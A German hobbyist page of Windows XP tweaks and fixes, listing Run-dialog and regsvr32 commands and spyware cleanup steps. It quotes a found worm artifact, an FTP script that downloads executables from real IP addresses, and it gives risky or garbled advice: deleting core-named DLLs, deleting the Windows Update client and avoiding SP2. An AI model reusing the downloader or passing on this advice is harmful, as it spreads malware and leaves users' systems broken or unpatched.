Microsoft Windows XP - Registry Tune Werkstatt
Areal System-Tune

Was geht Alles über Start / Ausführen..

InternetExplorer auf Werkseinstellung zurücksetzen
SpyWare VX2 Entfernung
Systemeigene Spyware deaktivieren
Ausführen.. Prog.-Liste
Microsft Auto-Update löschen
Desktop-Icon zum Sperren des Systems
Internet Explorer 6 Neu-Installation
ZIP-Funktion deaktivieren
Netzwerk & DFÜ - Verbindungsansich aktualisieren
Windows-Installer (MSI) Neuinstallation
System Shutdown - Countdown
Windows-Tastenkombinationen
Filesharing-Bremse, nach SP2, lösen


InternetExplorer auf Werkseinstellung zurücksetzen

Wenn nach zB Dialer,- und Spyware - Attacken der IE spinnt....

...und Deine Startseite eigendlich "About:Blank" anzeigt, da aber eine Suchmaschine ist.
Das hat nichts mit Javascript oder ähnlichen Komponenten zu tun.
Hinter diesem Phänomen steckt lediglich, daß einige
wichtige Teile des IE's durch neue Drittanwenderdateien erstzt wurden.

Achtung:
Die neuen Komponenten sind immernoch auf der Festplatte, und muessen
lediglich wieder aktiviert werden.

Um nun zB besagtes Prob. zu beheben, gehe wie folgt vor:
Klicke dazu auf Start --->Ausführen und tippe in die
Befehlszeile das Wort -regsvr32 urlmon.dll klicke dann auf “Ok”

Außer für Benutzer von Windows XP sollte die Versionsnummer der oleaut32.dll
kleiner als 3.50.5014.0 sein. Je nach installierter Office-Version variert die
Versionsnummer der oleaut32.dll.
Falls du kein Windows XP benutzt und die Versionsnummer tiefer als 3.50.5014.0 ist,
führe folgende Schritte durch. Tippe unter Start - Ausführen folgendes ein:


- regsvr32 /i Urlmon.dll [Enter-Taste]
- regsvr32 /i actxprxy.dll
- regsvr32 /i Shdocvw.dll
- regsvr32 /i Mshtml.dll
- regsvr32 /i Msjava.dll
- regsvr32 /i Shell32.dll
- regsvr32 /i Oleaut32.dll
- regsvr32 /i Browseui.dll
- regsvr32.exe /u regsrv32.dll (ab Sp2)

Diese Befehle setzen div. System-Dateien auf "Werkseinstellung" zurück.



nach Oben

SpyWare VX2 Entfernung

Zur SpyWare VX2 & Co Entfernung:

Generell hilft der Klick auf “ Start ” > “Ausführen” und die Eingabe in Befehlszeile von:
- regsvr32 /u VX2.DLL ----> [Enter-Taste]
Zum endgültigen aktivieren der Änderungen muss ein Neustart durchgeführt werden.


Was dieses " About:Blank " Page - Problem angeht, mit der Suchmaschine als Startseite,
die einfach nicht weg will..., folgendes: Sucht Euer System mal nach folgenen .dll's ab. -

- ADVAPI32.dll (Vorsicht, ist auch als Systemdatei vorhanden)
- RPCRT4.dll
- SHLWAPI.dll
- m.dll
- kch.dll
- fehdj.dll - vom 29.04.2004
- pepmec.dl - (Ja, hier nur .dl)
- midp.dll - vom 02.05.2004
- cmlalf.dll
- kernel32.dll - Ist keine Systemdatei !!!
- ws2_32.dll
- user32.dll
- gdi32.dll
- advcheck.dll
- pndh.dll - vom 03.05.2004
- bbhco.dll
- gdabl.dll
- dhhnba.dll - vom 06.05.2004
- enbbmla.dll - vom 13.05.2004
- appci.dll
- apeaeaa.dll - vom 16.05.2004
- omn.dll
- mcg.dll
- kigihgd.dll Neue .dll's vom 18.05.2004
- eejhhh.dll
- akdbib.dll


...und löscht diese. Das sind Trojaner (oder veränderte Systemdatein), in .dll-Form,
die von http://searchx.cc/ sind, - gemein klein, und effektiv. (ca.36 KB gross)
Denke, man hat sich's mit Java eingefangen, habe aber auch gehört,
das solche .dll über Tauschbörsen ins Haus kommen.

!!! Wichtig !!!
Schaut aber unbedingt vorher in die Dateieigenschaften,
ob die Datei nicht doch von Microsoft ist,
da div. Datein im Ordner "dllcache" existent sind !!!


Und seit 1.Mai 2004 ist wohl die .dll "out" , und scheinen es jetzt wieder über .exe zu versuchen. Der PC war genau 24 Std ohne Aufsicht (wegen IE-Freigabe) am Netzwerk, und Tag's darauf fand ich dann diese Dateien:

- 1621_up.exe
- 2409_up.exe
- 3292_up.exe
- 3870_up.exe
- 4603_up.exe
- 5878_up.exe
- 8302_up.exe
- 9039_up.exe
- 9960_up.exe
- 10064_up.exe
- 13785_up.exe
- 19939_up.exe
- 20389_up.exe
- 31880_up.exe

Die Zahlenfolge kann vareieren, was aber immer gleich bleibt, ist die Dateigröße, mit 15,5KB.
Was es auch ist; Löscht solche fragwürdigen Dateien lieber.... Dazu fand ich noch eine
Datei mit dem Namen "cmd.ftp"...mit dem Inhalt (Öffnen, mit Editor):

open 217.232.159.43 5554
anonymous
bin
get 3870_up.exe
bye
open 217.107.77.106 5554
anonymous
bin
get 19939_up.exe
bye
open 217.232.250.103 5554



!! Diesen File ebenfalls LÖSCHEN !!


Aktuell:
Sucht Euer System auch gleich mal nach der Datei "avserve2.exe" ab.
Hierbei handelt es sich um den SasserB. - C. Wurm.-
der einen Pufferüberlauf, der die Remote-Ausführung von Code zulässt und einem Angreifer die Steuerung über das gesamte infizierte System ermöglicht.
Dein Rechner macht sich selbstständig und gibt Dir noch 45 Sec. bis zu Herunterfahren. Mit dem Befehl "shutdown -a" in "Start --> Auführen.."
stoppt Ihr diesen Countdown. Nun fix den Patch von Microsoft XP Deu nachgeladen....
Wenn, nach Fund, gelöscht wurde, solltet Ihr umgehend mit XP-Clean die Registry säubern, und das am besten im "Abgesicherten Modus".

nach Oben

Systemeigene Spyware deaktivieren

Microsoft "Spyware" deaktivieren

Registrierversuche kann man unterbinden, indem man “Start” > “Ausführen” und in der Befehlszeile eingibt:
- regsvr32 /u %windir%\system32\regwizc.dll ----> [Enter-Taste]
- regsvr32 /u %windir%\system32\licdll.dll



nach Oben

“Ausführen” Prog.-Liste

Einige weitere Programme die noch über die Befehlszeile "Ausführen” aufgerufen werden können:

- msconfig...........................[Enter-Taste]

Dieses kleine Tool ist wohl bei Win2000 schlichtweg vergessen worden.
Download hier, und dann in den Ordner
"C:\WINNT" und die Hilfedatei in "C:\WINNT\HELP" ablegen.

- regedit
- ipconfig /p /all
- gpedit.msc
- devmgmt.msc
- diskmgmt.msc
- conf.exe...............(NetMeeting)
- certmgr.msc.........(Zertifikat - Manager)
- ciadv.msc.............(Indexdienst)
- compmgmt.msc....(Computerverwaltung)
- dfrg.msc...............(Defragmentierung)
- driverquery /p......(Lister aller aktiven Treiber)
- drwtsn32.exe.......(Dr. Watson)
*
- sfc /scannow (scant alle wichtigen Systemfiles auf's XP-Orginal und ersetzt falsche Versionen mit "korrekter Microsoft Vers.")
- sfc /scanonce (scant alle wichtigen Systemfiles auf's XP-Orginal)
- sfc /scanboot (scant nach jedem Start)
- sfc /Revert (scan zurücksetzen)
*
- sfc.exe /purgecache
..................................... }nacheinander
- sfc.exe /cachsize=100
*


System File Checker (sfc) Tool Syntax:
- sfc [/Scannow] [/Scanonce] [/Scanboot] [/Revert] [/Purgecache] [/Cachesize=x]



- dxdiag.exe............(Direct X - Diagnoseprogramm)
- eudcedit.exe.........(Editor für benutzerdef. Zeichen)
- eventvwr.msc........(Ereignisanzeige)
- fsmgmt.msc..........(Freigegebene Ordner)
- label......................(Laufwerk umbenennen)
- lusrmgr.msc..........(Benutzer und Gruppen)
- mem /p..................(Speicher Belegung)
- mstsc.exe.............(Remotedesktopverbindung)
- narrator.exe..........(XP-Sprachausgabe)
- ntbackup.exe.........(Sicherungs - Wiederherstellungs - Assistent)
- ntmsoprq.msc........(Übersicht über Wechselmedien)
- odbcad32.exe........(ODBC-Datenquellen-Administrator)
- osk.........................(Bildschirmtastatur)
- packager.exe.........(Objekt Manager)
- progman.exe..........(Programm Manager)
- rtcshare.exe...........(Gemeinsame Sitzungen)
*
- Rundll32 diskcopy.dll,DiskCopyRunDll....................(Diskette Kopieren)
- Rundll32 shell32.dll,ShellAboutA.............................(WindowsXP Info)
- Rundll32 shell32.dll,SHHelpShortcuts_RunDLL Connect.......(Netzlaufwerk verbinden)
*
- sigverif.exe.............(Dateisignaturverifizierung)
- shrpubw.exe...........(Freigabe erstellen)
- sysedit....................(Systemkonfiguration /System.ini/Win.ini/config.sys/autoexec.bat/ )
- taskmgr.exe............(Task - Manager)
*
- telnet.exe................(Telenet)
Alte Verbindungsmethoden wie telnet, rlogin, ftp, rcp, rsh übertragen eingegebene Passworte unverschlüsselt über das Netz und
gelten daher als sehr unsicher.

*
- tourstart.exe............(XP Tour)
- utilman.exe..............(Bildschirm Lupe + Tastatur)
- winchat.exe.............(Windows Chat)
- wmimgmt.msc.........(WMI-Steuerung)
*
- rundll32 Shell32,OpenAs_RunDLL......(Box "Öffnen mit" aufrufen)

________________Aber ACHTUNG:________________
!!!!____Bitte führt diese Befehle nicht einfach aus, wenn Ihr nicht wirklich wißt,______!!!!!!
!!!!____was diese bewirken. Da diese teilweise Veränderungen sofort ausführen,____!!!!!!
!!!!________die nicht ohne weiteres rückgängig gemacht werden können.___________!!!!!!



nach Oben

Microsft Auto-Update löschen

Microsft Auto-Update löschen
Auto-Update zuverlässig zu deaktivieren, muss man in folgenden Ordnern (soweit vorhanden)
die Datei WUAUCLT.EXE z.B. in WUAUCLT.EX umbenennen, oder gleich ganz löschen *lol*



Desktop-Icon zum Sperren des Systems

Erstellen eines Desktop-Icons zum Sperren des Systems

Wenn Ihr das System sperren wollt, benötigt das einigen Klickaufwand, doch es geht auch einfacher.
Lege eine neue Verknüpfung auf dem Desktop an:

Klick mit der rechten Maustaste in einen freien Bereich auf dem Desktop
Wähle aus dem Kontextmenü NEU --> VERKNÜPFUNG
Es erscheint ein Assistent zum Anlegen von Verknüpfungen, geb hier im Feld den Ort des Objekts mit folgenden Befehl ein:

- rundll32.exe user32.dll,LockWorkStation

Klick auf WEITER und geb einen Namen für die Verknüpfung ein, z.B. System sperren.

Klicke nun auf FERTIGSTELLEN

nach Oben


Internet Explorer 6 Neu-Installation

Dieses Problem habe ich auch schon einigemale gehabt.
Der Internet Explorer hat zwar dem Spaywareangriff standgehalten,
aber nun ist irgendwas faul....
Viele machen in diesem Moment den Fehler, den IE neu über den Defekten zu installieren.
Das kann zwar mal funzten, muss aber nicht.
Versuch es mal so..:

Lege Deine XP-Install CD ein.
Dann über Start / Ausführen in das Eingabefeld:

- rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%\inf\ie.inf

Bestätige das Ganze mit "OK".

Fertig, nun wird nicht nur der IE neu installiert, sondern der alte IE zuerst deinstall.



nach Oben


ZIP-Funktion deaktivieren

Die Windows XP-Interne ZIP-Funktion deaktivieren..., Start / Ausführen in das Eingabefeld:
- regsvr32 /u zipfldr.dll
Bestätige das Ganze mit "OK".
Wieder aktivieren:
- regsvr32 zipfldr.dll
...mit "OK".


nach Oben


Netzwerk & DFÜ - Verbindungsansich aktualisieren

Netzwerk-/DFÜ-Verbindungen werden nicht angezeigt, obwohl sie Aktiv sind..., Start / Ausführen in das Eingabefeld:
cmd ...dann:
- regsvr32 netman.dll
- regsvr32 netcfgx.dll
- regsvr32 netshell.dll
Bestätige jeweils das Ganze mit "OK".
PC neu booten, und die Netzwerk - und DFÜ-Verbindungen sind wieder existent.


Netmeeting installieren:
- conf
"OK"



Windows-Installer (MSI) Neuinstallation

Das Abschalten des Windows Installer Dienstes durch Anwendungen oder eigene Eingriffe
kann die Installation von Programmen verhindern.
Schalten Sie Ihn folgendermaßen wieder ein:
Klicke auf Start / Ausführen und tippe
- msiexec /unregister ein.
Bestätige das Ganze mit "OK".
Wieder aktivieren:
- msiexec /regserver
Bestätige...mit "OK".


nach Oben


System Shutdown-Countdown

System nach Vorgabe automatisch herunterfahren:

Start ---> Ausführen

- shutdown
+ die "Ausführungs-Befehle" dann dahinter:

-r reboot
-s shutdown
-t Zeit in sec
-a unterbricht Shutdown-Vorgang

z.B.
shutdown -s -t 360
... der PC fährt in 360 sec runter.
Bestätige...mit "OK".



nach Oben

Referenz aller Windows-Tastenkombinationen


Info:
Komplette Referenz aller Windows-Tastenkombinationen
Start ---> Ausführen
- C:\Windows\Help\keyshort.chm
Bestätige...mit "OK".



Filesharing-Bremse nach SP2 lösen

Seit SP2 höre ich immer öffters, dass zB. Emule nur noch mit LowID, bzw gar nicht mehr läuft.
Hier wurde die Datei "tcpip.sys" geändert, die für die max. parallele Verbindung des I.E. zuständig ist.
Mit dem Durchlauf von "XP-Antispy Ver. 3.91" ist das Thema erledigt.
Info:
Max-Verbindungen kann von 10 auf 50 geändert werden.
- C:\Windows\Help\keyshort.chm
Microsoft hat da auch schon ein
Update.
oder die Spezial-Version dieser Datei gibts hier.
Generell kann ich aber nur abraten vom SP2. Nach der Installation läuft bei den Meisten nix mehr, egal ob Corp. oder Legal-Serial.